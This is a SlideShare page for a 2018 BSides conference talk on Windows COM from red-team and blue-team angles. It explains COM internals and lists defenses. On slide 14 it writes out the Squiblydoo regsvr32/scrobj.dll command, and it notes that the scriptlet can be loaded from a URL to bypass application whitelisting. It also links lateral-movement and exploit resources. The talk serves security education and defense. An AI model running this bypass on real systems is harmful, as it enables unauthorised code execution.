SlideShare ist ein Scribd-Unternehmen logo

BSides Iowa 2018: Windows COM: Red vs Blue

A
Andrew Freeborn

Presentation at BSides Iowa 2018 discussing the background of Windows COM, red team value of Windows COM, and how blue teams can also use this knowledge.

Technologie
1 von 34
Downloaden Sie, um offline zu lesen
BSIDES IOWA 2018 ANDREW FREEBORN WINDOWS COM:
 RED VS BLUE
NEW PHONE; WHO DIS ▸IT Internal Audit Manager, Red Team at ACI Worldwide ▸Previously: Red Team, Pen Tester, IT ▸@maendarb ▸https://vivirytech.blogspot.com ▸There will be pictures, minimal C++
AGENDA ▸COM background ▸Red: COM exploitation ▸Blue: COM defense
SURPRISE, C++ https://blogs.msdn.microsoft.com/oldnewthing/20040205-00/?p=40733
WHAT’S THIS WINDOWS COM THING? ▸ Stands for “Component Object Model” ▸ Designed in the 90s to be interoperable, portable ▸ It’s old; great books aren’t digital ▸ Not a “Shell” like CMD or PowerShell ▸ “Like” .NET and WMI ▸ Why am I so interested in this?
WHAT’S THIS WINDOWS COM THING? RULE #1: WE DON’T SPEAK ABOUT COM ▸ Used everywhere in Windows ▸ When a user copies files, embeds Excel within Word ▸ It’s abstracted away with GUIs, .Net, APIs, and no one acknowledges that COM objects are being used
COM BACKGROUND: COM LIVES EVERYWHERE ▸ Obligatory COM history ▸ Precursor to .NET ▸ Meant to solve problems with developers like DLLs ▸ There’s so many COM objects and won’t go away ▸ OLE and ActiveX fit in here ▸ OLE (Object Linking and Embedding) lets you embed things (e.g. Excel sheet inside Word) ▸ ActiveX lets Internet Explorer make bad life choices
COM BACKGROUND: COM ON PAPER IS SUPER EASY TO WORK WITH ▸ Access COM things thru interfaces and objects ▸ Scripting.FileSystemObject ▸ IPersist ▸ IFileOperation ▸ WScript.Shell http://compinfopro.com/enable-remote-desktop-enable-rdp/
COM BACKGROUND: COM MAKES YOU WORK FOR IT ▸ COM is a hot mess
COM BACKGROUND: ITS LIKE COM MAKES UP THE RULES AS IT GOES ALONG ▸ COM is a hot mess and can live in: ▸ Windows Registry ▸ Windows made a special registry hive ▸ HKCR (HKEY_Classes_Root) ▸ Combines HKLM and HKCU ▸ Threading / InProcServer32
 ▸ Manifest files (COM scriptlets; Registration free too!)
COM BACKGROUND: COM MAKES YOU WORK FOR IT ▸ WScript.Shell demo
COM BACKGROUND: COM+ ZeroSum tweeted about a COM+ scriptlet, but how would you know it’s COM+ and not COM?
COM BACKGROUND: COM+ SCRIPTLET? (MOST LIKELY IT WAS JUST COM) ▸ Scriptlets come in both COM and COM+ flavors ▸ They allow you to have COM scripts to do non- malicious things like open calculator and cmd shells ▸ Did you know you can create COM objects from a Java class? Good thing no one has a JRE installed. https://msdn.microsoft.com/en-us/library/ms524620(v=vs.90).aspx
HAX: REGSVR32 /S /N /U /I:BACKDOOR-MINIMALIST.SCT SCROBJ.DLL ▸ subTee example: COM manifest file ▸ Demo! https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302
COM BACKGROUND: BREAKING DOWN THAT REGSVR32 HAX ▸ regsvr32 is used to register many things in the registry ▸ /s runs it silently, /n says to not call DllRegisterServer ▸ /u specifies which COM server to uninstall ▸ /i calls DllInstall of the COM object to register ▸ Can be pointed to a file on your system ▸ Can be a URL (http: COM moniker) ▸ Could even be a Java class (java: COM moniker) ▸ scrobj.dll makes the magic go http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
COM BACKGROUND: COM+ ▸ COM+ meant to solve the problems in COM like: ▸ Quickly implement common configurations for COM components like security boundaries ▸ Load DLLs into processes on demand ▸ Managed methods to manage COM components ▸ Multi-pass… err.. threading ▸ Slick GUI https://msdn.microsoft.com/en-us/library/windows/desktop/ms683512(v=vs.85).aspx
COM BACKGROUND: COM+ ▸ COM+ also came with rad icons in the GUI ▸ Demo! https://msdn.microsoft.com/en-us/library/windows/desktop/ms683512(v=vs.85).aspx
COM BACKGROUND: DCOM ▸ DCOM is “Distributed COM” ▸ “Helps you” in COM and COM+ with distributed transactions ▸ Slings COM object data typically with RPC ▸ Likes to make assumptions you know what you’re doing with security and marshaling data ▸ James Forshaw and Matt Nelson have been finding problems with Windows and apps marshaling data ▸ DCOM lateral movement script (enigma0x3)
 https://github.com/rvrsh3ll/Misc-Powershell-Scripts/ blob/master/Invoke-DCOM.ps1
COM BACKGROUND: .NET TO COM (BECAUSE LEGACY APPS AND SADNESS) ▸ .NET can work with COM for interoperability ▸ “The Runtime Callable Wrapper (RCW) is a mechanism that promotes transparent communication between COM and the managed programming model.” https://msdn.microsoft.com/en-us/library/office/bb610378.aspx
COM BACKGROUND: BREAKING DOWN THAT SWEET RCW GOODNESS ▸ This is what PowerShell uses to call into COM objects https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/ ComInterop/ComObject.cs
COM BACKGROUND: COM TO .NET (BUT WHY WOULD YOU DO THIS) ▸ COM can work with .Net thru COM Callable Wrappers ▸ “When a COM client calls a .NET object, the common language runtime creates the managed object and a COM callable wrapper (CCW) for the object. Unable to reference a .NET object directly, COM clients use the CCW as a proxy for the managed object.” https://msdn.microsoft.com/en-us/library/f07c8z1c(v=vs.85).aspx
COM BACKGROUND: DEEP TECHNICAL DETAIL OF THAT MAGIC ▸ James Forshaw talked about .Net and COM interoperability at DerbyCon 2017 ▸ IronGeek Link: ig2.me/pZ
COM BACKGROUND: THE DEEPER YOU GO, THE MORE C/C++ YOU’LL KNOW ▸ To dig in more, you’re going to have to know C, C++ https://blogs.msdn.microsoft.com/oldnewthing/20040205-00/?p=40733
COM EXPLOITATION: KNOWING THE C++ STORY CAN BE HELPFUL ▸ QueryInterface is how you query… for interfaces ▸ This is how you figure out what interfaces are available to you ▸ AddRef / Release may be important to you eventually ▸ Important if you want to partake in bug bounties :) ▸ This dictates the object lifetime by reference count ▸ Abusing the reference count introduces other avenues of attack (cough Use After Free) ▸ If open redirects are still around, we should fix those first
 https://blog.zsec.uk/cve-2017-3528/
COM EXPLOITATION: USE AFTER FREE HAS ALWAYS BEEN AN ISSUE ▸ Raymond Chen talked about this in 2004
 
 
 ▸ Exploit DB has stuff on AddRef being misused https://blogs.msdn.microsoft.com/oldnewthing/20040406-00/?p=39903 https://www.exploit-db.com/exploits/41042/
COM EXPLOITATION: COM, THE NEVER-ENDING STRUGGLE BUS ▸ Microsoft is still fixing COM related issues ▸ CVE-2018-0880/0882 ; Forshaw - A Bridge Too Far ▸ Researched by Haifei Li, Mark Dowd, James Forshaw ▸ Links posted on https://vivirytech.blogspot.com ▸ COM has a reoccurring theme at conferences forgotten/“rediscovered”, but still broke (lulz) ▸ Kinda like Adobe issues, right?
COM EXPLOITATION: WHAT ARE FUN WAYS COM HAS BEEN EXPLOITED? ▸ How is COM exploited? ▸ UACMe
 
 ▸ James Forshaw
 
 ▸ Casey Smith
 
 ▸ Matt Nelson
COM EXPLOITATION: WHAT TOOLS CAN I USE TO LEARN MORE? ALL FREE! ▸ Microsoft Process Explorer ▸ Find medium to high integrity attack paths ▸ ReactOS ▸ James Forshaw OleViewDotNet (github.com/tyranid/oleviewdotnet) ▸ See the COM goodies in Windows ▸ Find new unexplored attack COM paths!
WINDOWS COM, MICROSOFT’S GIFT TO THE RED TEAM ▸ Holy attack surface Batman! Thanks OleViewDotNet! ▸ 3,592 ways to see if you can discover a new attack path
WHAT HAPPENS WHEN I PRESS THIS BUTTON? ▸ Hey kid, wanna crash something? (this can peg your CPU) ▸ Watch with Process Monitor for potential attack paths
 https://github.com/FuzzySecurity/DefCon25 fondue.exe may be a privilege escalation path
WE NEED THE BLUE TEAM, AND THEY NEED US ▸ There’s a lot of fun things that leverage COM ▸ ZeroSum’s Koadic: COM C&C ▸ MITRE’s ATT&CK framework ▸ @SubTee tweets (seriously) ▸ We need to use their research to our gain ▸ Run things like Squiblydoo to see EDR response ▸ Work with the product groups and blue team ▸ See how these products trigger IOCs and act
BLUE TEAM FUN! ▸ Are you running Windows 10 RS4 / Windows Server 2016? ▸ SpecterOps Device Guard configs / guide ▸ Are you doing PowerShell cmdline audit AND reviewing? ▸ Users probably don’t run PowerShell, if they do, use v5+ ▸ Pick up on keywords like, “-COMObject” ▸ Do you really need wscript and cscript enabled? ▸ It can be done, ask @fpieces, he’s done it ▸ Deters attacks leveraging DotNetToJScript ▸ Investigate the potential of SysMon and Project VAST
ITS ALMOST TIME TO GO, LETS REVIEW QUICKLY ▸ COM is everywhere as it was ~20 years ago ▸ Lots of things not covered like “TreatAs” and monikers ▸ Many “exploits” are just abusing design decisions ▸ More research and community made tools will (most likely) bring to light more COM exploits and wreckage ▸ Other organizations also add their own COM objects ▸ Sad face:
LEARN MORE AND CONTACT ME BELOW ▸ For more info about COM: ▸ https://vivirytech.blogspot.com ▸ @maendarb ▸ Slack: https://omasec.herokuapp.com

Empfohlen

WebGL - It's GO Time
WebGL - It's GO TimeWebGL - It's GO Time
WebGL - It's GO Time
Tony Parisi
 
WebGL: The Next Generation
WebGL: The Next GenerationWebGL: The Next Generation
WebGL: The Next Generation
Tony Parisi
 
chrome os by mallikarjuna
chrome os by mallikarjunachrome os by mallikarjuna
chrome os by mallikarjuna
Ashok Reddy
 
How to Dockerize, Automate the Build and Deployment Process for Flutter?
How to Dockerize, Automate the Build and Deployment Process for Flutter?How to Dockerize, Automate the Build and Deployment Process for Flutter?
How to Dockerize, Automate the Build and Deployment Process for Flutter?
9 series
 
WebGL, HTML5 and How the Mobile Web Was Won
WebGL, HTML5 and How the Mobile Web Was WonWebGL, HTML5 and How the Mobile Web Was Won
WebGL, HTML5 and How the Mobile Web Was Won
Tony Parisi
 
Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...
Jim Birch
 
Lecture 2 - C Programming.pdf
Lecture 2 - C Programming.pdfLecture 2 - C Programming.pdf
Lecture 2 - C Programming.pdf
ssuser02936f
 
Cross-Platform Mobile Development in Visual Studio
Cross-Platform Mobile Development in Visual StudioCross-Platform Mobile Development in Visual Studio
Cross-Platform Mobile Development in Visual Studio
bryan costanich
 

Empfohlen

WebGL - It's GO Time
WebGL - It's GO TimeWebGL - It's GO Time
WebGL - It's GO Time
Tony Parisi
 
WebGL: The Next Generation
WebGL: The Next GenerationWebGL: The Next Generation
WebGL: The Next Generation
Tony Parisi
 
chrome os by mallikarjuna
chrome os by mallikarjunachrome os by mallikarjuna
chrome os by mallikarjuna
Ashok Reddy
 
How to Dockerize, Automate the Build and Deployment Process for Flutter?
How to Dockerize, Automate the Build and Deployment Process for Flutter?How to Dockerize, Automate the Build and Deployment Process for Flutter?
How to Dockerize, Automate the Build and Deployment Process for Flutter?
9 series
 
WebGL, HTML5 and How the Mobile Web Was Won
WebGL, HTML5 and How the Mobile Web Was WonWebGL, HTML5 and How the Mobile Web Was Won
WebGL, HTML5 and How the Mobile Web Was Won
Tony Parisi
 
Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...
Jim Birch
 
Lecture 2 - C Programming.pdf
Lecture 2 - C Programming.pdfLecture 2 - C Programming.pdf
Lecture 2 - C Programming.pdf
ssuser02936f
 
Cross-Platform Mobile Development in Visual Studio
Cross-Platform Mobile Development in Visual StudioCross-Platform Mobile Development in Visual Studio
Cross-Platform Mobile Development in Visual Studio
bryan costanich
 
Us 17-krug-hacking-severless-runtimes
Us 17-krug-hacking-severless-runtimesUs 17-krug-hacking-severless-runtimes
Us 17-krug-hacking-severless-runtimes
Ravishankar Somasundaram
 
Legacy of Void*
Legacy of Void*Legacy of Void*
Legacy of Void*
Adam Crain
 
Introduction-to-C-Part-1 (1).doc
Introduction-to-C-Part-1 (1).docIntroduction-to-C-Part-1 (1).doc
Introduction-to-C-Part-1 (1).doc
MayurWagh46
 
Introduction-to-C-Part-1.pdf
Introduction-to-C-Part-1.pdfIntroduction-to-C-Part-1.pdf
Introduction-to-C-Part-1.pdf
AnassElHousni
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at you
Rob Fuller
 
How to start your open source project
How to start your open source projectHow to start your open source project
How to start your open source project
Eslam Diaa
 
3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
Tokyo University of Science
 
TYPO3 CMS v8 in the cloud
TYPO3 CMS v8 in the cloudTYPO3 CMS v8 in the cloud
TYPO3 CMS v8 in the cloud
Johannes Goslar
 
2013-03-07 indie developer toolkit
2013-03-07 indie developer toolkit2013-03-07 indie developer toolkit
2013-03-07 indie developer toolkit
CocoaHeads Tricity
 
C++Basics2022.pptx
C++Basics2022.pptxC++Basics2022.pptx
C++Basics2022.pptx
Danielle780357
 
Session 1 - c++ intro
Session 1 - c++ introSession 1 - c++ intro
Session 1 - c++ intro
VijayaNagarajan5
 
Droidcon London 2021 - Full Stack Dart
Droidcon London 2021 - Full Stack DartDroidcon London 2021 - Full Stack Dart
Droidcon London 2021 - Full Stack Dart
Chris Swan
 
THE BASIC TOOLS
THE BASIC TOOLSTHE BASIC TOOLS
THE BASIC TOOLS
Ouzhanahin15
 
Introduction-to-C-Part-1.pptx
Introduction-to-C-Part-1.pptxIntroduction-to-C-Part-1.pptx
Introduction-to-C-Part-1.pptx
NEHARAJPUT239591
 
Introduction-to-C-Part-1 JSAHSHAHSJAHSJAHSJHASJ
Introduction-to-C-Part-1 JSAHSHAHSJAHSJAHSJHASJIntroduction-to-C-Part-1 JSAHSHAHSJAHSJAHSJHASJ
Introduction-to-C-Part-1 JSAHSHAHSJAHSJAHSJHASJ
meharikiros2
 
Dart on Arm - Flutter Bangalore June 2021
Dart on Arm - Flutter Bangalore June 2021Dart on Arm - Flutter Bangalore June 2021
Dart on Arm - Flutter Bangalore June 2021
Chris Swan
 
tybsc it asp.net full unit 1,2,3,4,5,6 notes
tybsc it asp.net full unit 1,2,3,4,5,6 notestybsc it asp.net full unit 1,2,3,4,5,6 notes
tybsc it asp.net full unit 1,2,3,4,5,6 notes
WE-IT TUTORIALS
 
.Net Debugging Techniques
.Net Debugging Techniques.Net Debugging Techniques
.Net Debugging Techniques
Bala Subra
 
.NET Debugging Tips and Techniques
.NET Debugging Tips and Techniques.NET Debugging Tips and Techniques
.NET Debugging Tips and Techniques
Bala Subra
 
Untangling8
Untangling8Untangling8
Untangling8
Derek Jacoby
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
Zilliz
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
MadyBayot
 

Weitere ähnliche Inhalte

Ähnlich wie BSides Iowa 2018: Windows COM: Red vs Blue

Legacy of Void*
Legacy of Void*Legacy of Void*
Legacy of Void*
Adam Crain
 
3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
Tokyo University of Science
 
2013-03-07 indie developer toolkit
2013-03-07 indie developer toolkit2013-03-07 indie developer toolkit
2013-03-07 indie developer toolkit
CocoaHeads Tricity
 
Introduction-to-C-Part-1 JSAHSHAHSJAHSJAHSJHASJ
Introduction-to-C-Part-1 JSAHSHAHSJAHSJAHSJHASJIntroduction-to-C-Part-1 JSAHSHAHSJAHSJAHSJHASJ
Introduction-to-C-Part-1 JSAHSHAHSJAHSJAHSJHASJ
meharikiros2
 
tybsc it asp.net full unit 1,2,3,4,5,6 notes
tybsc it asp.net full unit 1,2,3,4,5,6 notestybsc it asp.net full unit 1,2,3,4,5,6 notes
tybsc it asp.net full unit 1,2,3,4,5,6 notes
WE-IT TUTORIALS
 

Ähnlich wie BSides Iowa 2018: Windows COM: Red vs Blue (20)

Us 17-krug-hacking-severless-runtimes
Us 17-krug-hacking-severless-runtimesUs 17-krug-hacking-severless-runtimes
Us 17-krug-hacking-severless-runtimes
 
Legacy of Void*
Legacy of Void*Legacy of Void*
Legacy of Void*
 
Introduction-to-C-Part-1 (1).doc
Introduction-to-C-Part-1 (1).docIntroduction-to-C-Part-1 (1).doc
Introduction-to-C-Part-1 (1).doc
 
Introduction-to-C-Part-1.pdf
Introduction-to-C-Part-1.pdfIntroduction-to-C-Part-1.pdf
Introduction-to-C-Part-1.pdf
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at you
 
How to start your open source project
How to start your open source projectHow to start your open source project
How to start your open source project
 
3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
3-Way Scripts as a Practical Platform for Secure Distributed Code in Clouds
 
TYPO3 CMS v8 in the cloud
TYPO3 CMS v8 in the cloudTYPO3 CMS v8 in the cloud
TYPO3 CMS v8 in the cloud
 
2013-03-07 indie developer toolkit
2013-03-07 indie developer toolkit2013-03-07 indie developer toolkit
2013-03-07 indie developer toolkit
 
C++Basics2022.pptx
C++Basics2022.pptxC++Basics2022.pptx
C++Basics2022.pptx
 
Session 1 - c++ intro
Session 1 - c++ introSession 1 - c++ intro
Session 1 - c++ intro
 
Droidcon London 2021 - Full Stack Dart
Droidcon London 2021 - Full Stack DartDroidcon London 2021 - Full Stack Dart
Droidcon London 2021 - Full Stack Dart
 
THE BASIC TOOLS
THE BASIC TOOLSTHE BASIC TOOLS
THE BASIC TOOLS
 
Introduction-to-C-Part-1.pptx
Introduction-to-C-Part-1.pptxIntroduction-to-C-Part-1.pptx
Introduction-to-C-Part-1.pptx
 
Introduction-to-C-Part-1 JSAHSHAHSJAHSJAHSJHASJ
Introduction-to-C-Part-1 JSAHSHAHSJAHSJAHSJHASJIntroduction-to-C-Part-1 JSAHSHAHSJAHSJAHSJHASJ
Introduction-to-C-Part-1 JSAHSHAHSJAHSJAHSJHASJ
 
Dart on Arm - Flutter Bangalore June 2021
Dart on Arm - Flutter Bangalore June 2021Dart on Arm - Flutter Bangalore June 2021
Dart on Arm - Flutter Bangalore June 2021
 
tybsc it asp.net full unit 1,2,3,4,5,6 notes
tybsc it asp.net full unit 1,2,3,4,5,6 notestybsc it asp.net full unit 1,2,3,4,5,6 notes
tybsc it asp.net full unit 1,2,3,4,5,6 notes
 
.Net Debugging Techniques
.Net Debugging Techniques.Net Debugging Techniques
.Net Debugging Techniques
 
.NET Debugging Tips and Techniques
.NET Debugging Tips and Techniques.NET Debugging Tips and Techniques
.NET Debugging Tips and Techniques
 
Untangling8
Untangling8Untangling8
Untangling8
 

Kürzlich hochgeladen

Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
Overkill Security
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 

Kürzlich hochgeladen (20)

"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 

BSides Iowa 2018: Windows COM: Red vs Blue

  • 1. BSIDES IOWA 2018 ANDREW FREEBORN WINDOWS COM:
 RED VS BLUE
  • 2. NEW PHONE; WHO DIS ▸IT Internal Audit Manager, Red Team at ACI Worldwide ▸Previously: Red Team, Pen Tester, IT ▸@maendarb ▸https://vivirytech.blogspot.com ▸There will be pictures, minimal C++
  • 3. AGENDA ▸COM background ▸Red: COM exploitation ▸Blue: COM defense
  • 5. WHAT’S THIS WINDOWS COM THING? ▸ Stands for “Component Object Model” ▸ Designed in the 90s to be interoperable, portable ▸ It’s old; great books aren’t digital ▸ Not a “Shell” like CMD or PowerShell ▸ “Like” .NET and WMI ▸ Why am I so interested in this?
  • 6. WHAT’S THIS WINDOWS COM THING? RULE #1: WE DON’T SPEAK ABOUT COM ▸ Used everywhere in Windows ▸ When a user copies files, embeds Excel within Word ▸ It’s abstracted away with GUIs, .Net, APIs, and no one acknowledges that COM objects are being used
  • 7. COM BACKGROUND: COM LIVES EVERYWHERE ▸ Obligatory COM history ▸ Precursor to .NET ▸ Meant to solve problems with developers like DLLs ▸ There’s so many COM objects and won’t go away ▸ OLE and ActiveX fit in here ▸ OLE (Object Linking and Embedding) lets you embed things (e.g. Excel sheet inside Word) ▸ ActiveX lets Internet Explorer make bad life choices
  • 8. COM BACKGROUND: COM ON PAPER IS SUPER EASY TO WORK WITH ▸ Access COM things thru interfaces and objects ▸ Scripting.FileSystemObject ▸ IPersist ▸ IFileOperation ▸ WScript.Shell http://compinfopro.com/enable-remote-desktop-enable-rdp/
  • 9. COM BACKGROUND: COM MAKES YOU WORK FOR IT ▸ COM is a hot mess
  • 10. COM BACKGROUND: ITS LIKE COM MAKES UP THE RULES AS IT GOES ALONG ▸ COM is a hot mess and can live in: ▸ Windows Registry ▸ Windows made a special registry hive ▸ HKCR (HKEY_Classes_Root) ▸ Combines HKLM and HKCU ▸ Threading / InProcServer32
 ▸ Manifest files (COM scriptlets; Registration free too!)
  • 11. COM BACKGROUND: COM MAKES YOU WORK FOR IT ▸ WScript.Shell demo
  • 12. COM BACKGROUND: COM+ ZeroSum tweeted about a COM+ scriptlet, but how would you know it’s COM+ and not COM?
  • 13. COM BACKGROUND: COM+ SCRIPTLET? (MOST LIKELY IT WAS JUST COM) ▸ Scriptlets come in both COM and COM+ flavors ▸ They allow you to have COM scripts to do non- malicious things like open calculator and cmd shells ▸ Did you know you can create COM objects from a Java class? Good thing no one has a JRE installed. https://msdn.microsoft.com/en-us/library/ms524620(v=vs.90).aspx
  • 14. HAX: REGSVR32 /S /N /U /I:BACKDOOR-MINIMALIST.SCT SCROBJ.DLL ▸ subTee example: COM manifest file ▸ Demo! https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302
  • 15. COM BACKGROUND: BREAKING DOWN THAT REGSVR32 HAX ▸ regsvr32 is used to register many things in the registry ▸ /s runs it silently, /n says to not call DllRegisterServer ▸ /u specifies which COM server to uninstall ▸ /i calls DllInstall of the COM object to register ▸ Can be pointed to a file on your system ▸ Can be a URL (http: COM moniker) ▸ Could even be a Java class (java: COM moniker) ▸ scrobj.dll makes the magic go http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
